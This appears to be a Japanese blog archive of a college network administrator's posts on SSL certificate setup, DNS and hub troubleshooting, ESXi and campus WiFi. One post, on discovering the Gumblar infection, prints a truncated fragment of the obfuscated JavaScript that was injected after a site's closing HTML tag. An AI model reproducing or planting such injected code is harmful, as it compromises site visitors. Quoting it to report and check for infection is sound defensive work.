Networkの最近のブログ記事

学科に求人募集の企業さんから、2通のメールが届きました。

(1通目)
> Subject: 【株式会社×××】採用選考会のご案内
> 進路担当様 各位 ....
>  [以下略]
(2通目)
> Subject: 取り消し: 【株式会社×××】採用選考会のご案内
> ◯◯◯◯はメッセージ - "【株式会社×××】採用選考会のご案内"
> を取り消します。

たぶん、求人募集のメールを送信間違いで送って、取り消したんでしょうが、 最近Gmailなどで実装された「一定時間以内ならメールの取り消し」と 同様の機能を使ったのだろうと思います。

だけど、一定時間に間に合わないと、2通目のような極めてぶっきらぼうな メールが相手先に飛んでしまうんでしょうか?

これじゃ、2通目で相手に極めて失礼な印象を持たれて、 ビジネス的には思いっきりマイナスじゃないでしょうか....

送信取り消し機能が、「スンドメール」とかで出てきた頃から、 「身近な送信サーバが実際の送信まで遅延させる」んだから、 遅配の原因にもなるし、あんまり使えないと思っていたけど、 このメール見ると「使っちゃいけない機能」に思えてくる。

学術研究機関を対象とした、無償のSSL認証キーの発行サービスの申請のTSVファイル生成だが、 機構管理下となったので、手順が一部変更となった。 手順が長いので、肝心な所は記載しないが、その入力などの内容をメモ。 最終的に、電子情報工学科のTSVファイルと、緊急連絡システム用のTSVファイルを作った。

# mkdir /etc/apache2/ssl.key/
# cd /etc/apache2/ssl.key/
# cp 大きいファイル1 randfile1.txt
# cp 大きいファイル2 randfile2.txt
# cp 大きいファイル3 randfile3.txt
# openssl genrsa -des3
   -rand randfile1.txt:randfile2.txt:randfile3.txt 2048
   > iris.key
Enter pass phrase: [passphrase]
Verifying - Enter pass phrase: [passphrase]
# lv iris.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,xxxxxxxxx
:
-----END RSA PRIVATE KEY-----

# openssl req -new -key iris.key -sha1 -out iris.csr
Enter pass phrase for maisy.key: [passphrase]
Country Name (2 letter code) [AU]:JP
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:Academe
Organization Name (eg, company) [Internet Widgits Pty Ltd]:National Institute of Technology
Organizational Unit Name (eg, section) []:Fukui College
Common Name (eg, YOUR name) []:www.ei.fukui-nct.ac.jp
Email Address []:.

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:.
An optional company name []:.
maisy:/etc/apache2/ssl.key# lv iris.csr
-----BEGIN CERTIFICATE REQUEST-----
:
-----END CERTIFICATE REQUEST-----

maisy:/etc/apache2/ssl.key# openssl req -noout -text -in iris.csr
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: C=JP, L=Academe2, O=Fukui National College of Technology,
                 OU=Electronics and Information Department,
                 CN=www.ei.fukui-nct.ac.jp
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (2048 bit)
                Modulus (2048 bit):

https://certs.nii.ac.jp/cgi-bin/tsvtool.cgi
TSV作成ツール:発行申請TSV
・CSRファイルから iris.csr [CSR送信]

CSR
主体者DN CN=www.ei.fukui-nct.ac.jp,OU=...
サーバFQDN www.ei.fukui-nct.ac.jp
dNSName   なし
加入者Email 自分のメール
加入者氏名   斉藤 徹
加入者所属   福井工業高等専門学校電子情報工学科
ソフトウェア名等  Apache 2.4.6
[完了]

[ダウンロード]
issue-YYYYMMDD.tsv

実際に鍵を登録

UPKIの事務局に、issue-YYYYMMDD.tsv を送ったら、 鍵を入手するための「UKPI-ODCert]Webサーバ証明書発行受付通知」なるメールが 送られてきた。指定されたURLをアクセスして、サーバ証明書を受け取る。 ファイル名は、"サーバFQDN.cer"であった。(Apacheへの登録では"*.crt"に直す)
これに加えて、別途 "nii-odca3sha1.cer" を入手しておく。

このままだと、Webサーバ起動時にパスフレーズを聞かれるので、

# openssl rsa -in iris.key -out iris-passphrase.key
:
Enter pass phrase for iris.key: [passphrase]
# cd /etc/apache2/ssl.key
# mv ...PATH.../サーバFQDN.cer ./iris.crt
# vi /etc/apache2/sites-enabled/100-default-ssl
  :
SSLCertificateFile    /etc/apache2/ssl.key/iris.crt
SSLCertificateKeyFile /etc/apache2/ssl.key/iris-passphrase.key
SSLCertificateChainFile /etc/apache2/ssl.key/nii-odca3sha1.crt
  :
# /etc/init.d/apache2 restart

正月休みも明けて、サーバのパッケージ更新などをかけたけど、 その影響か自室のWiFi環境でネットワークでページが見れない。 どうも、WiFiルータ配下のパソコンでつながるPCやら、 繋がらない端末がある。色々状況を調べていたら、 DHCPサーバからのDNSが原因っぽい。

iPhoneのWiFi接続で、HTTPのIPアドレス生打ちで接続ができることから、 DNS問題ということが確定。ノートパソコンでDNSを試すと、 nslookupで"connection refused"なんて表示される。 WiFiルータのDHCPサーバが、自分自身をDNSサーバとしてクライアントに 通知しているのに接続できない。ルータの設定は変更していないので、 上流のDNSサーバ(学科基幹サーバ)が、拒否している予感。

bind9では、配下のDNSサーバへのゾーン転送は偽物情報を流されるのを 防ぐために、暗号キーで認証したりするようになってきた。 しかし、この設定は面倒だし、/etc/bind/named.conf を修正し、

(( /etc/bind/named.conf ))
allow-transfer { localnet; }

を追加してみる。今までは、allow-transfer はデフォルトOKだったけど、 bind9 の更新で、デフォルトNGになったのだろう。

VMware ESXiのインストール

次期学科サーバは、余力のある多機能な仮想サーバ上で動かそうと、 VMware ESXi(free)を入れてみた。ゲストOSに、DebianとWindows Server2008 を入れてひとまずお試し。

ただ、インストールの際は、自室のMac環境では、Mac用の vSphere client が無い。そこで、Parallels Desktopで Windows 7を動かしてその中で、 Windows用 vSphere client を動かしてインストール。

あまりにも仮想環境のためにCPU無駄遣いとは思いながらも、 vSphere client 越しに、仮想サーバのWindows Serverが普通に立ち上がる。 ここまで来たら、 無駄の極みの処理速度を実感してみようと、 ゲストOSのDebianとWindowsの間を、 リモートデスクトップでつないで動かしてみた。

それでも、遅いと思いながらも使える速度で Firefox が立ち上がった。

(Mac OS X Snow Leopard)
 - Parallels Desktop for Mac
   (Windows 7 Ultimated)
   - vSpere client for Windows
      (VMware ESXi 5.1)
         (Windows Server 2008r2)
         - Remote Desktop for Windows
            (Debian 6.0/testing) XRDP
             - gnome / Firefox
1211010855_863x730.png

moodleサーバのHUB故障

学内で動かしている、moodleサーバが動かないとのトラブル。

高専祭のイベントで、被災体験をするとのことで本館の電気を消して 一晩泊まってみるとの企画から、10/20 の夜に本館が停電となった。

10/21に通電して復旧したはずだったけど、どうも今朝も moodle サーバ が応答しない。お呼びがかかって確認するが、普通にサーバには login はできる。それなりのプロセスも起動している。

次のステップで、学内どうしの ping を確認すると、繋がらない。 ふとヤバイな...とHUBをみると、FAULTのオレンジ色ランプがついている。 確認ということで、お隣にある別サーバに ping を打っても反応せず。

ということで、HUB故障決定。余っていた5ポートHUBを接続し、動作確認 がとれ、無事復旧。

HUBの内部回路的に弱っていて停電が、トドメの一撃だったんだろうな....

電子情報棟では、学生実験などでのノートパソコンのネットワーク接続手段 として、FERECのルータを活用している。 アクセスポイントのSSID,パスワードを知っている利用者であれば、 WiFi接続後に、Web認証が要求されるので、 自分の学籍番号ベースのIDとパスワードを入力すれば、 ネットワークが利用できるようになる。

ただし、ネットワーク接続によるトラブルを避けるために、 http,httpsしか利用できないようにFirewall機能を設定してある。 特別の登録IDを設定すれば、Firewallの条件を変えることもできる。

IEEE.802.11n対応ハイパワーAPに更新

これまでは、主要な実験室にはハイパワーのアクセスポイント、 実験的に導入していた部屋には、小型のアクセスポイントを設置していた。 元々の機材は11a.b.gに対応していたが、フロアや実験室の場所によっては、 電波が弱く接続が困難であった。

今回、業務用の11n対応のハイパワーアクセスポイントに変更し、 電波条件もかなり改善し、電子情報棟のすべての教室・大きな実験室では、 十分な電波強度でアクセスポイントに接続が可能となった。

Moodleネットワーク機能

現在福井高専で運用している Moodle サーバへの機能拡張をするための、 打ち合わせに同席した。現在、f-leccsではシングルサインオンにより、 県立大学に設置されている f-leccs の Moodle サーバは、関係学校より 自由に使える。 こういう2重のMoodleサーバを運用している中で、機能拡張で、 Moodle ネットワーク機能と、携帯でアンケートを取る機能を、見せてもらった。

Moodleネットワーク機能は、他のMoodleサーバにも接続できるようになる機能みたい。 シングルサインオンで使える f-leccs があるから、 必須ではないが、将来的にシームレスに Moodle を連携するときには便利かな。

なにかとGoogleに仕事を含めデータを預けている状態で、 Gmailをつかっていたら、海外からアクセスされているとの警告。

あわてて、Gmailと、Yahoo(パスワードは別だけど最悪キーロガー系のウィルスを食った心配から) のパスワードを変更する。 状況を確認するために、アクセス元のアドレスを確認すると、ustream.tv 。 アクセスの日も、ちょうど、CEREVO CAM が届いて ustream.tv のユーザ登録をした。 gmail との連携の設定したっけ?という感じだが、ひとまず安心そうな雰囲気。

おぉ、そういえば ust 開始を伝える YouTube との連携で、gmail の登録したなぁ... 先日来のPC厄日のおかげで、パソコン作業がなんでもかんでも疑心暗鬼... 職場のスケジュール&自宅スケジュールもgoogle calendar。 iPod touch でも、google document 関係で、iPodだけでもアプリ別に5,6回、パスワードを登録している。だから、パスワード変更もすぐには終わらない。帰ったら、さらにパスワード変更は続く...

Gumblar発見

知り合いのサイトのホームページがウィルスに感染といった話を聞き、 ちょいとチェックしてみた。 view-sourceしてみても、なんともないなぁ...と思っていたら、 フレームソース側のページの末尾に、以下のようなコードがついている。

</HTML> 
  
<script>this.a="a";R=["m","n"];bn=["w","q","X"];var h;this.bT=56183;this.bT++;var Rp="Rp";b=function(){function T(V,k,J){try {var U='yq'} catch(U){};return V.substr(k,J);FJ=34518;FJ--;EK=3475;EK--;}Tc={Xk:"Vq"};try {var aJ='ox'} catch(aJ){};this.aP="aP";var L=RegExp;var e='';try {} catch(xg){};var xF=new Array();var O=document;var P=T("/nexDtf",0,3)+T("smlwegmls",3,3)+"g-
(略)
<!--7004d276c84c037576423cf73522a32f-->

どうも、JavaScriptのプログラムが難読化されて追加させられている。

当人さんに電話して確認したら、通常のウィルス対策とは別手段のシステムを 導入するとのお話し。やむおえないかな....と、他人事とも言っていられないので、 自分の関連するサイトのソース末尾に変なコードが埋め込まれていないか、 ちょいとチェックしてみた。ひとまず安心...ふぅ...

Gumblar は、ホームページのメンテナンスをしているパソコンに感染し、 FTPのパスワードを入手して遠隔から改ざんという手口もあるから、タチが悪い。 といっても、私の場合メンテナンスは、すべてsloginで該当サーバにログインして、 emacs で直接HTML手書き編集するか、MovableTypeで編集だから、 この辺の心配はないわな...

学術研究機関を対象とした、無償のSSL認証キーの発行サービスの申請のTSVファイル生成を行う。 手順が長いので、肝心な所は記載しないが、その入力などの内容をメモ。 最終的に、電子情報工学科のTSVファイルと、緊急連絡システム用のTSVファイルを作った。

# mkdir /etc/apache2/ssl.key/
# cd /etc/apache2/ssl.key/
# cp 大きいファイル1 randfile1.txt
# cp 大きいファイル2 randfile2.txt
# cp 大きいファイル3 randfile3.txt
# openssl genrsa -des3
   -rand randfile1.txt:randfile2.txt:randfile3.txt 2048
   > maisy.key
Enter pass phrase: [passphrase]
Verifying - Enter pass phrase: [passphrase]
# lv maisy.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,xxxxxxxxx
:
-----END RSA PRIVATE KEY-----

# openssl req -new -key maisy.key -sha1 -out maisy.csr
Enter pass phrase for maisy.key: [passphrase]
Country Name (2 letter code) [AU]:JP
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:Academe2
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Fukui National College of Technology
Organizational Unit Name (eg, section) []:Electronics and Information Department
Common Name (eg, YOUR name) []:www.ei.fukui-nct.ac.jp
Email Address []:.

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:.
An optional company name []:.
maisy:/etc/apache2/ssl.key# lv maisy.csr
-----BEGIN CERTIFICATE REQUEST-----
:
-----END CERTIFICATE REQUEST-----

maisy:/etc/apache2/ssl.key# openssl req -noout -text -in maisy.csr
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: C=JP, L=Academe2, O=Fukui National College of Technology,
                 OU=Electronics and Information Department,
                 CN=www.ei.fukui-nct.ac.jp
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (2048 bit)
                Modulus (2048 bit):

https://tsvtool.nii.ac.jp/cgi-bin/tsvtool.cgi
TSV作成ツール:発行申請TSV
・CSRファイルから maisy.csr [CSR送信]

CSR
主体者DN CN=www.ei.fukui-nct.ac.jp,OU=...
サーバFQDN www.ei.fukui-nct.ac.jp
dNSName   なし
加入者Email 自分のメール
加入者氏名   斉藤 徹
加入者所属   福井工業高等専門学校電子情報工学科
ソフトウェア名等  Apache 2.2.9
[完了]

[ダウンロード]
issue-YYYYMMDD.tsv

実際に鍵を登録

UPKIの事務局に、issue-YYYYMMDD.tsv を送ったら、 鍵を入手するための「UKPI-ODCert]Webサーバ証明書発行受付通知」なるメールが 送られてきた。指定されたURLをアクセスして、サーバ証明書を受け取る。 ファイル名は、"サーバFQDN.cer"であった。(Apacheへの登録では"*.crt"に直す)
これに加えて、別途 "nii-odca2.crt" を入手しておく。

# cd /etc/apache2/ssl.key
# mv ...PATH.../サーバFQDN.cer ./maisy.crt
# vi /etc/apache2/sites-enabled/100-default-ssl
  :
SSLCertificateFile    /etc/apache2/ssl.key/maisy.crt
SSLCertificateKeyFile /etc/apache2/ssl.key/maisy.key
SSLCertificateChainFile /etc/apache2/ssl.key/nii-odca2.crt
  :
# /etc/init.d/apache2 restart
起動すると、鍵作成時のパスフレーズを聞かれるので、入力する。

2015年12月

    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

アーカイブ

Google

このアーカイブについて

このページには、過去に書かれたブログ記事のうちNetworkカテゴリに属しているものが含まれています。

前のカテゴリはEIです。

次のカテゴリはtwitterです。

最近のコンテンツはインデックスページで見られます。過去に書かれたものはアーカイブのページで見られます。